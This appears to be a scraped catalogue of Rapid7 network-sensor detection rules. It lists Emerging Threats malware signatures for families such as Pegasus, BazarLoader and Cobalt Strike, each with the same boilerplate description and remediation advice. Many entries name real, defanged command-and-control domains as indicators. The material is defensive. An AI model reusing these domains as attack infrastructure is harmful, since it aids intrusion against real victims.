This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Client CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Client Data POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Command Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Command Sent to Client

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NORTHSTAR Interactive Client CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Novaloader Stage 2 VBS Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSIS/TrojanDownloader.Agent.NZK CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSIS/TrojanDownloader.Agent.NZK CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSO Group Pegasus Related Data Exfil (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSO Group Pegasus Related Data Exfil (POST) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NSO Group Pegasus Related Data Exfil (POST) M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE nspps Backdoor CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE nspps Backdoor - Sending SOCKS Details

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE nspps Backdoor - Task Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NS SSL Cert APT1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NuggetPhantom Module Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nuke Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Nymaim.BA CnC M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nymaim.BA CnC M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Obitel Downloader Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AHK Downloader Request Structure

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed APT41 Malicious SSL Cert (ColunmTK Campaign)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed APT/SideWinder CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AridViper CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Awad Bot CnC Domain (hawad .000webhostapp .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed AZORult CnC Domain (miscrosoftworrd .000webhostapp .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (bigjamg .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (cntrhum .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (dghns .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (doldig .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (gut45bg .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (moig .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (numklo .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (sh78bug .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BazarLoader Domain (vighik .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Blackrota Domain (blackrato .ga in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BLINDINGCAN Domain (www .automercado .co .cr in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BLINDINGCAN Domain (www .sanlorenzoyacht .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BLINDINGCAN Domain (www .sanlorenzoyacht .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BLUELIGHT Payload Domain (storage .jquery .services in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed BOUNCEBEAM Backdoor CnC Domain (cloudflare .5156game .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Buer Loader CnC Domain (kkjjhhdff .site in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Buer Loader Domain (officewestunionbank .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Buran Ransomware UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Buran Ransomware UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Buran Ransomware UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Buran Ransomware UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Buran Ransomware UA (BURAN)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Buran Ransomware UA (GHOST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Card Skimmer CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CDC Ransomware User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Observed Certificate Containing Double Base64 Encoded Executable Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Certificate Containing Possible Base64 Encoded Powershell Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Stike CnC Domain (nirsoft .me in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain (charity-wallet .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Observed CobaltStrike CnC Domain (defendersecyrity .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (defenderupdateav .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Observed Cobalt Strike CnC Domain (dimentos .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain (gmbfrom .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Observed Cobalt Strike CnC Domain (gojihu .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (Gojihu .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain in TLS SNI (cs .lg22l .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike CnC Domain (krinsop .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Observed Cobalt Strike CnC Domain (onlineworkercz .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (sazoya .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE Observed Cobalt Strike CnC Domain (security-desk .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (securityupdateav .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Observed CobaltStrike CnC Domain (stg .pesrado .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (windowsupdatesc .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Observed Cobalt Strike CnC Domain (www .msfthelpdesk .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (yawero .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE Observed Cobalt Strike CnC Domain (yuxicu .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike CnC Domain (Yuxicu .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Encrypted Channel - T1573

ET MALWARE Observed Cobalt Strike Domain (asureupdate .tech in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike Domain in TLS SNI (stackpatc-technologies .digital)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike Loader Domain (cybersecyrity .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobaltStrike/TEARDROP CnC Domain Domain in TLS SNI (mobilnweb .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Cobalt Strike User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobInt CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CobInt CnC Domain in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed CoinMiner CnC Domain (en24zuggh3ywlj .x .pipedream .net in TLS SNI)

